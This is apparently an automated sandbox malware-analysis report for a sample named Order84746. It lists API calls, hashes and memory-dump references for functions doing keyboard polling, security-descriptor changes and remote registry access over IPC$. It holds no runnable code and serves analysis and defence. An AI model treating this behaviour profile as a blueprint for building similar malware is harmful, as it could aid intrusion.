                          • Opcode Fuzzy Hash: ddde88fecdf982f806a9021db4855f1d0d7f818cd28ce971a2134384f9379b05
                          • Instruction Fuzzy Hash: 06414975A01204EFDB119F65CC88EAA7BB8FF89725F108058F926D7260D7B09D40EB60
                          Function 009305F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                          Download Yara Rule
                          APIs
                          • __wsplitpath.LIBCMT ref: 0093076F
                          • _wcscat.LIBCMT ref: 00930787
                          • _wcscat.LIBCMT ref: 00930799
                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009307AE
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 009307C2
                          • GetFileAttributesW.KERNEL32(?), ref: 009307DA
                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 009307F4
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00930806
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                          • String ID: *.*
                          • API String ID: 34673085-438819550
                          • Opcode ID: df86110f38b441e5e34e132d6896b3acaa383637b53148145b39194e4e499e40
                          • Instruction ID: 6e7e85bafc4fd3c002db7c7c95dac8a6398fd74aff27fd3124a3ea69b9de2fdc
                          • Opcode Fuzzy Hash: df86110f38b441e5e34e132d6896b3acaa383637b53148145b39194e4e499e40
                          • Instruction Fuzzy Hash: DB817E715043459FCB24DF28C86696AB7E8FBC9308F148D2EF889D7251E634D954CF92
                          Function 0091A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0091ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0091ABD7
                            • Part of subcall function 0091ABBB: GetLastError.KERNEL32(?,0091A69F,?,?,?), ref: 0091ABE1
                            • Part of subcall function 0091ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0091A69F,?,?,?), ref: 0091ABF0
                            • Part of subcall function 0091ABBB: RtlAllocateHeap.NTDLL(00000000,?,0091A69F), ref: 0091ABF7
                            • Part of subcall function 0091ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0091AC0E
                            • Part of subcall function 0091AC56: GetProcessHeap.KERNEL32(00000008,0091A6B5,00000000,00000000,?,0091A6B5,?), ref: 0091AC62
                            • Part of subcall function 0091AC56: RtlAllocateHeap.NTDLL(00000000,?,0091A6B5), ref: 0091AC69
                            • Part of subcall function 0091AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0091A6B5,?), ref: 0091AC7A
                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0091A8CB
                          • _memset.LIBCMT ref: 0091A8E0
                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0091A8FF
                          • GetLengthSid.ADVAPI32(?), ref: 0091A910
                          • GetAce.ADVAPI32(?,00000000,?), ref: 0091A94D
                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0091A969
                          • GetLengthSid.ADVAPI32(?), ref: 0091A986
                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0091A995
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0091A99C
                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0091A9BD
                          • CopySid.ADVAPI32(00000000), ref: 0091A9C4
                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0091A9F5
                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0091AA1B
                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0091AA2F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 2347767575-0
                          • Opcode ID: bc356115280e48261a5e94f747a49f4190334019fce9e6407a731ab70465c1d4
                          • Instruction ID: c0b43bc0b3002b0cfee86f10796e35c9dccc9a0d308bacb5f49302d37849c548
                          • Opcode Fuzzy Hash: bc356115280e48261a5e94f747a49f4190334019fce9e6407a731ab70465c1d4
                          • Instruction Fuzzy Hash: C0514B71A01209AFDF10DF90DD45AEEBBBAFF44300F048119E921A6290DB749E45DB61
                          Function 0092CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LoadString__swprintf_wprintf
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2889450990-2391861430
                          • Opcode ID: 388bd82beff61bc568ac80ee49636f83c134ac98ac8847726989dca8e7ec4a0d
                          • Instruction ID: e3bc312cc5e2fd87103492b9aabaffcbfbd89b778b764869424d44a3dc21fc4a
                          • Opcode Fuzzy Hash: 388bd82beff61bc568ac80ee49636f83c134ac98ac8847726989dca8e7ec4a0d
                          • Instruction Fuzzy Hash: 9651BD71800159BACF14EBA8DD46EEEB778FF06304F104065F505B20A2EB716F59DB62
                          Function 0092CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LoadString__swprintf_wprintf
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2889450990-3420473620
                          • Opcode ID: 4cc6dc2eeb8613ec29d9bec190f75b264d4beaf825db4397b7caf7c0d2dfc8c2
                          • Instruction ID: 79d69b136b48f4aff4ad1fc6e61cb4f3e759ba4cdf96685bea4ad92e554c31db
                          • Opcode Fuzzy Hash: 4cc6dc2eeb8613ec29d9bec190f75b264d4beaf825db4397b7caf7c0d2dfc8c2
                          • Instruction Fuzzy Hash: A251BD71900259AACF15EBE8DD42EEEB778FF05344F104065F105B20A2EB706F59DB62
                          Function 009255BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 009255D7
                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00925664
                          • GetMenuItemCount.USER32(009A1708), ref: 009256ED
                          • DeleteMenu.USER32(009A1708,00000005,00000000,000000F5,?,?), ref: 0092577D
                          • DeleteMenu.USER32(009A1708,00000004,00000000), ref: 00925785
                          • DeleteMenu.USER32(009A1708,00000006,00000000), ref: 0092578D
                          • DeleteMenu.USER32(009A1708,00000003,00000000), ref: 00925795
                          • GetMenuItemCount.USER32(009A1708), ref: 0092579D
                          • SetMenuItemInfoW.USER32(009A1708,00000004,00000000,00000030), ref: 009257D3
                          • GetCursorPos.USER32(?), ref: 009257DD
                          • SetForegroundWindow.USER32(00000000), ref: 009257E6
                          • TrackPopupMenuEx.USER32(009A1708,00000000,?,00000000,00000000,00000000), ref: 009257F9
                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00925805
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                          • String ID:
                          • API String ID: 3993528054-0
                          • Opcode ID: fa8ba29a0282193f3b049d8a05d18fea4048b7760b18ffe276f1ae897971b695
                          • Instruction ID: 7a4fc8e0266397b6a787250877d42a04ddc2ee95f32354f5bbcc844f2b9a27f5
                          • Opcode Fuzzy Hash: fa8ba29a0282193f3b049d8a05d18fea4048b7760b18ffe276f1ae897971b695
                          • Instruction Fuzzy Hash: C9712670645A25BFFB209F54EC49FAABF69FF40368F254205F529AA1E8C7B05C10DB90
                          Function 0091A14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 0091A1DC
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0091A211
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0091A22D
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0091A249
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0091A273
                          • CLSIDFromString.COMBASE(?,?), ref: 0091A29B
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0091A2A6
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0091A2AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 1687751970-22481851
                          • Opcode ID: 363467e47d3a3fb73e34b2b5c1425d6b323f25a96e401b1ebbe005b284827fc5
                          • Instruction ID: 61a8755b755a2ac891b0f301031d08f3d3573ddb99e42718e92f7f8e92e3413f
                          • Opcode Fuzzy Hash: 363467e47d3a3fb73e34b2b5c1425d6b323f25a96e401b1ebbe005b284827fc5
                          • Instruction Fuzzy Hash: 47412672D1122DABCF11EBA9DC85DEDB7B8FF19354F004029E911A3160EB709E45DB91
                          Function 009225B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009536F4,00000010,?,Bad directive syntax error,0097DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009225D6
                          • LoadStringW.USER32(00000000,?,009536F4,00000010), ref: 009225DD
                          • _wprintf.LIBCMT ref: 00922610
                          • __swprintf.LIBCMT ref: 00922632
                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009226A1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                          • API String ID: 1080873982-4153970271
                          • Opcode ID: 4e1134d4803b830eaf50cc4129fb86ab33756a6eb0cd11b1db46292d59941c1f
                          • Instruction ID: 66e0683cb8dc8c093f23482839dacb7c02c6368d2f526c9e10a6bccad7a4f1fc
                          • Opcode Fuzzy Hash: 4e1134d4803b830eaf50cc4129fb86ab33756a6eb0cd11b1db46292d59941c1f
                          • Instruction Fuzzy Hash: 45218D3290025ABFCF11AF94CC0AFEE7B39FF19308F04445AF515A20A2EB71A619DB51
                          Function 00927AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00927B42
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00927B58
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00927B69
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00927B7B
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00927B8C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: SendString
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 890592661-1007645807
                          • Opcode ID: 7ce12de20c51f0c58d919d7c1adf587c9617cf54e8f30dfb3a97745d92dd0a4b
                          • Instruction ID: 06140c11883596aacefa86c66cea2630385feda0ef1ec917d1ef12585a079a4b
                          • Opcode Fuzzy Hash: 7ce12de20c51f0c58d919d7c1adf587c9617cf54e8f30dfb3a97745d92dd0a4b
                          • Instruction Fuzzy Hash: 0D1198A1A502A979DB20B7EADC4ADFFBA7CEBD2B14F0044197411F20D1DA601E45C6B1
                          Function 0092778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • timeGetTime.WINMM ref: 00927794
                            • Part of subcall function 008FDC38: timeGetTime.WINMM(?,75C0B400,009558AB), ref: 008FDC3C
                          • Sleep.KERNEL32(0000000A), ref: 009277C0
                          • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009277E4
                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00927806
                          • SetActiveWindow.USER32 ref: 00927825
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00927833
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00927852
                          • Sleep.KERNEL32(000000FA), ref: 0092785D
                          • IsWindow.USER32 ref: 00927869
                          • EndDialog.USER32(00000000), ref: 0092787A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          • API String ID: 1194449130-3405671355
                          • Opcode ID: 928cbf61b63deb1a86ca4c25d74ff4593c9a680163f7ff872f8beb0a56878189
                          • Instruction ID: bc331f8e20bf97fc75aa9137b3c771a8244cfbe1674690dc0125a606ae3fed73
                          • Opcode Fuzzy Hash: 928cbf61b63deb1a86ca4c25d74ff4593c9a680163f7ff872f8beb0a56878189
                          • Instruction Fuzzy Hash: DA2162B062D219BFE7045B60FC89B2ABF2DFF46348B404128F51792165CFB14D04EAA1
                          Function 009302EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • CoInitialize.OLE32(00000000), ref: 0093034B
                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009303DE
                          • SHGetDesktopFolder.SHELL32(?), ref: 009303F2
                          • CoCreateInstance.COMBASE(0096DA8C,00000000,00000001,00993CF8,?), ref: 0093043E
                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009304AD
                          • CoTaskMemFree.COMBASE(?), ref: 00930505
                          • _memset.LIBCMT ref: 00930542
                          • SHBrowseForFolderW.SHELL32(?), ref: 0093057E
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009305A1
                          • CoTaskMemFree.COMBASE(00000000), ref: 009305A8
                          • CoTaskMemFree.COMBASE(00000000), ref: 009305DF
                          • CoUninitialize.COMBASE ref: 009305E1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                          • String ID:
                          • API String ID: 1246142700-0
                          • Opcode ID: 560459e88f96644599e2bd4642815f6587adb13b31a2e4a4673457370f204895
                          • Instruction ID: 37b2bc68d796277e56903a743a140751295ac840701603610460e1be845636bb
                          • Opcode Fuzzy Hash: 560459e88f96644599e2bd4642815f6587adb13b31a2e4a4673457370f204895
                          • Instruction Fuzzy Hash: EFB1E675A00209AFDB04DFA9C8989AEBBB9FF88304F048459F915EB251DB70EE41CF50
                          Function 00922E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00922ED6
                          • SetKeyboardState.USER32(?), ref: 00922F41
                          • GetAsyncKeyState.USER32(000000A0), ref: 00922F61
                          • GetKeyState.USER32(000000A0), ref: 00922F78
                          • GetAsyncKeyState.USER32(000000A1), ref: 00922FA7
                          • GetKeyState.USER32(000000A1), ref: 00922FB8
                          • GetAsyncKeyState.USER32(00000011), ref: 00922FE4
                          • GetKeyState.USER32(00000011), ref: 00922FF2
                          • GetAsyncKeyState.USER32(00000012), ref: 0092301B
                          • GetKeyState.USER32(00000012), ref: 00923029
                          • GetAsyncKeyState.USER32(0000005B), ref: 00923052
                          • GetKeyState.USER32(0000005B), ref: 00923060
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 7b9cf2c0476ce97b5398b837c716dbd4df7648664c21c72d1c29ffe9dd91a465
                          • Instruction ID: 6b60f6f7e94f870c257c2ff8e24e1e55323068744dd8815b93ea20e5bc83fd9e
                          • Opcode Fuzzy Hash: 7b9cf2c0476ce97b5398b837c716dbd4df7648664c21c72d1c29ffe9dd91a465
                          • Instruction Fuzzy Hash: B251EB60A087E439FB35DB64A9107EEBFF85F11340F08859DD5C25A1C6DA949B4CC7A2
                          Function 0091ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 0091ED1E
                          • GetWindowRect.USER32(00000000,?), ref: 0091ED30
                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0091ED8E
                          • GetDlgItem.USER32(?,00000002), ref: 0091ED99
                          • GetWindowRect.USER32(00000000,?), ref: 0091EDAB
                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0091EE01
                          • GetDlgItem.USER32(?,000003E9), ref: 0091EE0F
                          • GetWindowRect.USER32(00000000,?), ref: 0091EE20
                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0091EE63
                          • GetDlgItem.USER32(?,000003EA), ref: 0091EE71
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0091EE8E
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0091EE9B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 0216c98d760daf0f4b646f1f71f1dd379e0ce86de3ffcb62daf814408ca6844c
                          • Instruction ID: 6d494dd2a7cf67626edc2e62e15073c39ca94fcb17fa132845c9f7c4b5a66fde
                          • Opcode Fuzzy Hash: 0216c98d760daf0f4b646f1f71f1dd379e0ce86de3ffcb62daf814408ca6844c
                          • Instruction Fuzzy Hash: 0F511375B14209AFDB18CF69DD85AAEBBBAFB88700F54812DF919D72D0D7B09D408B10
